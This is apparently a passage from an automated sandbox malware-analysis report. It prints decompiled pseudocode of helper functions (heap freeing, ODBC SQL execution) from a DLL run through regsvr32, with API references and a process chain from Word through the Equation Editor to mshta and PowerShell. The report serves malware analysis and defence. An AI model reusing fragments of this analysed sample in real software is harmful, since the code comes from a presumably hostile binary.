							 *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0x20) = _t91;
							 *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0xdb0) = _t91;
						}
						_t86 = _t86 + 4;
						__eflags = _t86 - 0x60;
					} while (_t86 < 0x60);
					 *( *((intOrPtr*)(_t90 + 4)) + 0xe0) = _t91;
					 *( *((intOrPtr*)(_t90 + 4)) + 0xe4) = _t91;
					__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)))) - _t91;
					if( *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)))) != _t91) {
						__eflags =  *_t90 + 0x20;
						E10011530( *_t90 + 0x20,  *_t90 + 0x20);
						_t94 = _t94 + 4;
					}
					_t59 =  *((intOrPtr*)(_t90 + 4));
					__eflags =  *(_t59 + 0x38) - _t91;
					if( *(_t59 + 0x38) != _t91) {
						_t89 =  *(_t59 + 0x38);
						__imp____p__iob();
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							fclose(_t89);
							_t94 = _t94 + 4;
						}
						 *( *((intOrPtr*)(_t90 + 4)) + 0x38) = _t91;
					}
					_t80 =  *((intOrPtr*)(_t90 + 4));
					__eflags =  *((intOrPtr*)(_t80 + 0xe10)) - _t91;
					if( *((intOrPtr*)(_t80 + 0xe10)) != _t91) {
						_t84 = _t80 + 0xe7c;
						_t88 = 0xc;
						_t83 = _t80 + 0x138;
						while(1) {
							__eflags =  *_t83 -  *_t84;
							if( *_t83 !=  *_t84) {
								break;
							}
							_t83 = _t83 + 4;
							_t84 = _t84 + 4;
							_t88 = _t88 - 4;
							__eflags = _t88;
							if(_t88 >= 0) {
								continue;
							} else {
							}
							goto L23;
						}
						_t91 = 1;
					}
					L23:
					 *((intOrPtr*)(_t80 + 0xe18)) = 0;
					E1000F670(_t90);
					 *((intOrPtr*)( *_t90)) = 9;
					__eflags = _t91;
					_t44 = _t91 == 0;
					__eflags = _t44;
					return 0 | _t44;
				} else {
					_t2 = _t91 + 1; // 0x1
					return _t2;
				}
			}

0x1000b5b2
0x1000b5b6
0x1000b5bd
0x1000b5d8
0x1000b5dd
0x1000b5e0
0x1000b5e9
0x1000b5ef
0x1000b5f1
0x1000b5f7
0x1000b5f9
0x1000b5fc
0x1000b601
0x1000b604
0x1000b60d
0x1000b60d
0x1000b5f9
0x1000b619
0x1000b61e
0x1000b621
0x1000b626
0x1000b629
0x1000b62c
0x1000b62e
0x1000b630
0x1000b630
0x1000b634
0x1000b639
0x1000b63c
0x1000b63c
0x1000b642
0x1000b649
0x1000b64b
0x1000b64e
0x1000b653
0x1000b656
0x1000b65d
0x1000b65d
0x1000b664
0x1000b667
0x1000b667
0x1000b66f
0x1000b678
0x1000b681
0x1000b683
0x1000b687
0x1000b68b
0x1000b690
0x1000b690
0x1000b693
0x1000b696
0x1000b699
0x1000b69b
0x1000b69e
0x1000b6a4
0x1000b6a6
0x1000b6a9
0x1000b6af
0x1000b6af
0x1000b6b5
0x1000b6b5
0x1000b6b8
0x1000b6bb
0x1000b6c1
0x1000b6c3
0x1000b6c9
0x1000b6ce
0x1000b6d4
0x1000b6d6
0x1000b6d8
0x00000000
0x00000000
0x1000b6da
0x1000b6dd
0x1000b6e0
0x1000b6e0
0x1000b6e3
0x00000000
0x00000000
0x1000b6e5
0x00000000
0x1000b6e3
0x1000b6e7
0x1000b6e7
0x1000b6ec
0x1000b6ed
0x1000b6f7
0x1000b702
0x1000b70b
0x1000b70e
0x1000b70e
0x1000b712
0x1000b5c0
0x1000b5c0
0x1000b5c4
0x1000b5c4

APIs

Part of subcall function 10010D40: memset.MSVCRT ref: 10010D66
Part of subcall function 10010D40: memset.MSVCRT ref: 10010D89
Part of subcall function 10010D40: free.MSVCRT(?), ref: 10010DEE

free.MSVCRT(?), ref: 1000B5FC

Part of subcall function 1000FA00: free.MSVCRT(?,?,1000B61E,?), ref: 1000FA0C

free.MSVCRT(?), ref: 1000B634
free.MSVCRT(?), ref: 1000B64E
__p__iob.MSVCRT ref: 1000B69E
fclose.MSVCRT ref: 1000B6A9

Part of subcall function 1000F670: memset.MSVCRT ref: 1000F6E8

Part of subcall function 10011530: free.MSVCRT(1000B698,?), ref: 100120C0
Part of subcall function 10011530: free.MSVCRT(?,?), ref: 100120D0
Part of subcall function 10011530: free.MSVCRT(?,?), ref: 100120E0
Part of subcall function 10011530: memset.MSVCRT ref: 100120F0

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100086CF, Relevance: 7.6, APIs: 5, Instructions: 63

C-Code - Quality: 59%

			E100086CF(char _a4, wchar_t* _a8) {
				signed short _t10;
				signed int _t12;
				signed short _t13;
				signed int _t14;
				char* _t15;
				intOrPtr _t17;
				intOrPtr* _t26;
				void* _t27;

				_t26 = _a4;
				_t17 = 0;
				_t10 = _t26 + 8;
				 *((intOrPtr*)(_t26 + 0x14)) = 0;
				_t27 =  *_t10;
				if(_t27 != 0 && _a8 != 0) {
					_push(_t10);
					_push( *_t26);
					_push(3);
					L10007383();
					_t12 = _t10 & 0x0000ffff;
					if(_t12 == 0 || _t12 == 1) {
						_t13 = wcslen(_a8);
						_push(_t13);
						_push(_a8);
						_push(_t27);
						L1000738F();
						_t14 = _t13 & 0x0000ffff;
						if(_t14 == 0 || _t14 == 1) {
							_t15 =  &_a4;
							_t17 = 1;
							_push(_t15);
							_push(_t27);
							L10007395();
							if(_t15 == 0) {
								 *((intOrPtr*)(_t26 + 0x14)) = _a4;
							}
						} else {
							E10008B11(1, _t27, 3);
						}
						_push(_t27);
						_push(3);
						L1000739B();
					}
				}
				return _t17;
			}

0x100086d5
0x100086d8
0x100086da
0x100086dd
0x100086e0
0x100086e4
0x100086eb
0x100086ec
0x100086ee
0x100086f0
0x100086f7
0x100086fe
0x10008708
0x1000870e
0x1000870f
0x10008712
0x10008713
0x1000871a
0x10008721
0x10008734
0x10008737
0x10008739
0x1000873a
0x1000873b
0x10008743
0x10008748
0x10008748
0x10008728
0x1000872b
0x10008731
0x1000874b
0x1000874c
0x1000874e
0x1000874e
0x100086fe
0x10008759

APIs

SQLAllocHandle.ODBC32(00000003,?,?), ref: 100086F0
wcslen.MSVCRT ref: 10008708
SQLExecDirectW.ODBC32(?,?,00000000,00000003,?,?), ref: 10008713
SQLFreeHandle.ODBC32(00000003,?,?,?,?,?,00000000,00000003,?,?), ref: 1000874E

Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37

SQLRowCount.ODBC32(?,?,?,?,00000000,00000003,?,?), ref: 1000873B

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008656, Relevance: 6.1, APIs: 4, Instructions: 51

C-Code - Quality: 51%

			E10008656(intOrPtr* _a4, wchar_t* _a8, signed char _a12) {
				signed short _t16;
				signed int _t17;
				intOrPtr* _t20;
				void* _t26;
				intOrPtr* _t27;

				_t27 = _a4;
				_t26 = 0;
				E10008EA1(_t27);
				_t20 = _t27 + 8;
				_push(_t20);
				_push( *_t27);
				 *((intOrPtr*)(_t27 + 4)) =  *_t20;
				_push(3);
				L10007383();
				if(_a8 != 0) {
					if((_a12 & 0x00000001) != 0) {
						_push(0xfffffffa);
						_push(2);
						_push(6);
						_push( *((intOrPtr*)(_t27 + 4)));
						L10007389();
					}
					_t16 = wcslen(_a8);
					_push(_t16);
					_push(_a8);
					_push( *((intOrPtr*)(_t27 + 4)));
					L1000738F();
					_t17 = _t16 & 0x0000ffff;
					if(_t17 == 0 || _t17 == 1) {
						_t26 = 1;
					} else {
						E10008B11(1,  *((intOrPtr*)(_t27 + 4)), 3);
					}
				}
				return _t26;
			}

0x1000865a
0x1000865f
0x10008661
0x10008667
0x1000866c
0x1000866d
0x1000866f
0x10008672
0x10008674
0x1000867c
0x10008682
0x10008684
0x10008686
0x10008688
0x1000868a
0x1000868d
0x1000868d
0x10008695
0x1000869b
0x1000869c
0x1000869f
0x100086a2
0x100086a9
0x100086b0
0x100086c5
0x100086b7
0x100086bc
0x100086c2
0x100086b0
0x100086cc

APIs

Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EC8
Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EDE
Part of subcall function 10008EA1: SQLFreeHandle.ODBC32(00000003,?,?,?,10008666,?), ref: 10008EED

SQLAllocHandle.ODBC32(00000003,?,?), ref: 10008674
SQLSetStmtAttrW.ODBC32(?,00000006,00000002,000000FA,00000003,?,?), ref: 1000868D
wcslen.MSVCRT ref: 10008695
SQLExecDirectW.ODBC32(?,?,00000000,00000003,?,?), ref: 100086A2

Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10008C07, Relevance: 6.0, APIs: 4, Instructions: 19

C-Code - Quality: 43%

			E10008C07(void* _a4) {
				void* _t6;

				_t6 = _a4;
				E10008EA1(_t6);
				_push( *((intOrPtr*)(_t6 + 8)));
				_push(3);
				L1000739B();
				_push( *_t6);
				L100073B3();
				_push( *_t6);
				_push(2);
				L1000739B();
				return HeapFree( *0x10028080, 0, _t6);
			}

0x10008c08
0x10008c0d
0x10008c13
0x10008c16
0x10008c18
0x10008c1d
0x10008c1f
0x10008c24
0x10008c26
0x10008c28
0x10008c3d

APIs

Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EC8
Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EDE
Part of subcall function 10008EA1: SQLFreeHandle.ODBC32(00000003,?,?,?,10008666,?), ref: 10008EED

SQLFreeHandle.ODBC32(00000003,?), ref: 10008C18
SQLDisconnect.ODBC32(?,00000003,?), ref: 10008C1F
SQLFreeHandle.ODBC32(00000002,?,?,00000003,?), ref: 10008C28
HeapFree.KERNEL32(00000000,?,00000002), ref: 10008C36

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B090, Relevance: 5.1, APIs: 4, Instructions: 62

C-Code - Quality: 100%

			E1000B090(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t40;
				void* _t43;
				void* _t45;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t40 =  *0x1002c5c0; // 0x8b0000
						HeapFree(_t40, 0,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = wcslen(_a8);
					if( *_a4 != 0) {
						_t12 = _v8 + 0xa; // 0xa
						_t43 =  *0x1002c5c0; // 0x8b0000
						 *_a4 = HeapReAlloc(_t43, 0,  *_a4, _v8 + _t12);
					} else {
						_t8 = _v8 + 0xa; // 0xa
						_t45 =  *0x1002c5c0; // 0x8b0000
						 *_a4 = HeapAlloc(_t45, 0, _v8 + _t8);
					}
					E1000B260(_a8,  *_a4, _a8, _v8);
				}
				return _v8 + _v8 + 2;
			}

0x1000b094
0x1000b09f
0x1000b113
0x1000b11d
0x1000b124
0x1000b12d
0x1000b12d
0x1000b0a1
0x1000b0ad
0x1000b0b6
0x1000b0d9
0x1000b0e6
0x1000b0f6
0x1000b0b8
0x1000b0bb
0x1000b0c2
0x1000b0d2
0x1000b0d2
0x1000b106
0x1000b106
0x1000b13d

APIs

wcslen.MSVCRT ref: 1000B0A5
HeapAlloc.KERNEL32(008B0000,00000000,0000000A), ref: 1000B0C9
HeapReAlloc.KERNEL32(008B0000,00000000,00000000,0000000A), ref: 1000B0ED
HeapFree.KERNEL32(008B0000,00000000,00000000), ref: 1000B124

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B540, Relevance: 5.0, APIs: 4, Instructions: 41

C-Code - Quality: 93%

			E1000B540(void* _a4) {
				void* _t10;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;

				_t18 = _a4;
				_push(_t18);
				E1000B5B0();
				_t21 = _t20 + 4;
				_t10 =  *( *(_t18 + 4) + 0x460);
				if(_t10 != 0) {
					free(_t10);
					_t21 = _t21 + 4;
				}
				E1000F9A0( *((intOrPtr*)( *(_t18 + 4) + 0x3c)));
				_t22 = _t21 + 4;
				_t19 = 0;
				do {
					_t16 = E10010950( *(_t18 + 4) - 0xffffff80 + _t19);
					_t19 = _t19 + 0xc;
					_t22 = _t22 + 4;
				} while (_t19 < 0x60);
				free( *(_t18 + 4));
				free( *_t18);
				free(_t18);
				return _t16;
			}

0x1000b543
0x1000b547
0x1000b548
0x1000b550
0x1000b559
0x1000b561
0x1000b564
0x1000b566
0x1000b566
0x1000b56f
0x1000b574
0x1000b577
0x1000b580
0x1000b589
0x1000b58e
0x1000b591
0x1000b594
0x1000b59c
0x1000b5a0
0x1000b5a3
0x1000b5ab

APIs

Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B5FC
Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B634
Part of subcall function 1000B5B0: free.MSVCRT(?), ref: 1000B64E
Part of subcall function 1000B5B0: __p__iob.MSVCRT ref: 1000B69E
Part of subcall function 1000B5B0: fclose.MSVCRT ref: 1000B6A9

free.MSVCRT(?), ref: 1000B564

Part of subcall function 1000F9A0: free.MSVCRT(?,00000000,1000B9BF,?), ref: 1000F9AC
Part of subcall function 1000F9A0: free.MSVCRT(1000B9BF,00000000), ref: 1000F9ED

Part of subcall function 10010950: free.MSVCRT(?,00000000,1000B58E,?), ref: 1001095C
Part of subcall function 10010950: free.MSVCRT(FE8304C4,00000000,1000B58E,?), ref: 1001096D

free.MSVCRT(?), ref: 1000B59C
free.MSVCRT(?), ref: 1000B5A0
free.MSVCRT(?), ref: 1000B5A3

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10011530, Relevance: 5.0, APIs: 4, Instructions: 40

C-Code - Quality: 94%

			E10011530(void* __eflags, void* _a4) {
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t16 = _a4;
				_t2 = _t16 + 0x170; // 0x1000b800
				E100127E0(_t2);
				_t20 = _t19 + 4;
				_t3 = _t16 + 8; // 0x1000b698
				_pop(_t17);
				_a4 = _t3;
				_t18 = _a4;
				if(_t18 != 0) {
					_t12 =  *_t18;
					if(_t12 != 0) {
						free(_t12);
						_t20 = _t20 + 4;
					}
					_t13 =  *(_t18 + 0x10);
					if(_t13 != 0) {
						free(_t13);
						_t20 = _t20 + 4;
					}
					_t14 =  *(_t18 + 0x14);
					if(_t14 != 0) {
						free(_t14);
						_t20 = _t20 + 4;
					}
					memset(_t18, 0, 0x168);
				}
				return 0;
			}

0x10011531
0x10011535
0x1001153c
0x10011541
0x10011544
0x10011547
0x10011548
0x100120b1
0x100120b7
0x100120b9
0x100120bd
0x100120c0
0x100120c5
0x100120c5
0x100120c8
0x100120cd
0x100120d0
0x100120d5
0x100120d5
0x100120d8
0x100120dd
0x100120e0
0x100120e5
0x100120e5
0x100120f0
0x100120f5
0x100120fb

APIs

Part of subcall function 100127E0: free.MSVCRT(1000B800,1000B690,10011541,1000B800,?,1000B690,?), ref: 100127F0

free.MSVCRT(1000B698,?), ref: 100120C0
free.MSVCRT(?,?), ref: 100120D0
free.MSVCRT(?,?), ref: 100120E0
memset.MSVCRT ref: 100120F0

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 100091F5, Relevance: 5.0, APIs: 4, Instructions: 31

C-Code - Quality: 100%

			E100091F5(wchar_t* _a4) {
				wchar_t* _t6;
				void** _t13;

				_t6 = E1000A910( *0x1002c16c);
				_t13 = _t6;
				if( *_t13 != 0) {
					_t6 = HeapFree( *0x10028080, 0,  *_t13);
					 *_t13 =  *_t13 & 0x00000000;
				}
				if(_a4 != 0) {
					_t6 = HeapAlloc( *0x10028080, 0, 2 + wcslen(_a4) * 2);
					 *_t13 = _t6;
					if(_t6 != 0) {
						return wcscpy(_t6, _a4);
					}
				}
				return _t6;
			}

0x100091fc
0x10009201
0x10009206
0x10009212
0x10009218
0x10009218
0x10009220
0x1000923c
0x10009242
0x10009246
0x00000000
0x10009253
0x10009246
0x10009255

APIs

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10009212
wcslen.MSVCRT ref: 10009226
HeapAlloc.KERNEL32(00000000,00000000,00000000,10008B42,10028168,?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1), ref: 1000923C
wcscpy.MSVCRT ref: 1000924D

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10012350, Relevance: 5.0, APIs: 4, Instructions: 28

C-Code - Quality: 100%

			E10012350(void* _a4, intOrPtr _a8) {
				signed int _t8;
				void* _t16;

				_t16 = _a4;
				if(_t16 == 0) {
					return _t8 | 0xffffffff;
				} else {
					memset(_t16, 0, 0x168);
					 *(_t16 + 4) = 0x4000;
					 *_t16 = malloc(0x4000);
					 *((intOrPtr*)(_t16 + 0x18)) = 0x400;
					 *((intOrPtr*)(_t16 + 0x10)) = malloc(0x1000);
					 *((intOrPtr*)(_t16 + 0x14)) = malloc(0x2000);
					 *((intOrPtr*)(_t16 + 0x150)) = _a8;
					return 0;
				}
			}

0x10012351
0x10012357
0x100123af
0x10012359
0x10012361
0x1001236b
0x1001237c
0x1001237e
0x1001238f
0x1001239a
0x100123a1
0x100123aa
0x100123aa

APIs

memset.MSVCRT ref: 10012361
malloc.MSVCRT ref: 10012372
malloc.MSVCRT ref: 10012385
malloc.MSVCRT ref: 10012392

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Exploits:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: WINWORD.EXE PID: 3116 Parent PID: 2840

General

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 3172 Parent PID: 548

General

Chronological Activities

Analysis Process: mshta.exe PID: 3196 Parent PID: 3172

General

Chronological Activities

Analysis Process: powershell.exe PID: 3488 Parent PID: 3196

General

Chronological Activities